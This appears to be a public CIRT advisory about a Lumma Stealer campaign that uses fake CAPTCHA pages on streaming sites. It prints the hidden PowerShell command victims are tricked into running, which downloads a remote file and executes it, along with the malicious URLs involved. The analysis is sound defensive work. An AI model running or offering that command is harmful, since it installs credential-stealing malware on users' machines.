Emerging threat: Stealer Malware (Lumma C2) Campaign with fake CAPTCHA pages

TLP: CLEAR

Distribution: Public

Type of Threat: Stealer Malware (C2)

Date: 08 October 2024

Executive Summary

The Cyber Threat Intelligence (CTI) Unit at BGD e-GOV CIRT has recently identified a stealer malware campaign linked to the notorious Lumma Stealer malware family. Further investigation has revealed that multiple variants of stealer malware are being distributed using similar tactics. This report details how our threat intelligence researchers detected and analyzed this evolving malware campaign.

Our CTI Unit has been actively monitoring stealer malware campaigns and has identified evidence of malware that exfiltrates sensitive user information both locally and globally. In a recent analysis, we detected Lumma Stealer malware being propagated through deceptive CAPTCHA pages. This report will illustrate how users are lured into falling victim to this novel approach of utilizing CAPTCHA pages.

Fig: Global infection samples of Lumma C2 variants

Stealer Malware’s Footprint in Bangladesh

Fig: Recently detected Victims sample with stealer malwares in Bangladesh

Infection Chain

Step 1: Initial Access via Malicious Hyperlinks

Several websites in Bangladesh, popular for streaming movies, have been identified as vectors for delivering malicious content to unsuspecting users. When users interact with these websites, they are presented with a convincing CAPTCHA. Upon solving the CAPTCHA, they are instructed to open the Windows RUN prompt and paste a suspiciously long string. In our case, we found the following URL were involved in these attacks as primary web surfing activities:

· https://tinyzonetv[.]stream

Right after clicking on the above link redirects users by opens up a CAPTCHA screen similar to the following URL –

https[:]//s3.ap-southeast-1.wasabisys.com/il4build/access-for-verification-page-05.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X Amz-Credential=MKL7RR2DGMIBE69KPENT%2F20241005%2Fap-southeast

1%2Fs3%2Faws4_request&X-Amz-Date=20241005T202512Z&X-Amz-Expires=43200&X-Amz-Signature=0a626639486a647545ce6cb94f7e0b7109cb6c34c7ecc9a1486a14b32a81eb9a&X-Amz-SignedHeaders=host&x-id=GetObject

When a user tries to refresh the screen with clicking on “I’m not a robot”, in background the page generates a PowerShell script and automatically it copies the PowerShell script in clipboard and it instruct user to run the script from user’s command line.

Step 2: Execution of PowerShell Commands

When the user does the activities as per instruction on the malicious URL, the following PowerShell script will execute on user’s device and perform the activities according to the below script.

powershell.exe -W Hidden -command $url = 'https://go-for-zip.b cdn.net/il/4/file/n4.txt'; $response = Invoke-WebRequest -Uri $url UseBasicParsing; $text = $response.Content; iex $text

Breakdown of the PowerShell Command:

1. powershell.exe -W Hidden: This runs PowerShell in hidden mode, concealing the execution from the user.

2. $url = 'https://go-for-zip.b-cdn.net/il/4/file/n4[.]txt': A URL points to a remote file hosted on an external server.

3. $response = Invoke-WebRequest -Uri $url -UseBasicParsing: This command fetches the contents of the remote file using Invoke-WebRequest.

4. $text = $response.Content: The contents retrieved from the file are stored in the variable $text.

Click Here to Get the full Document.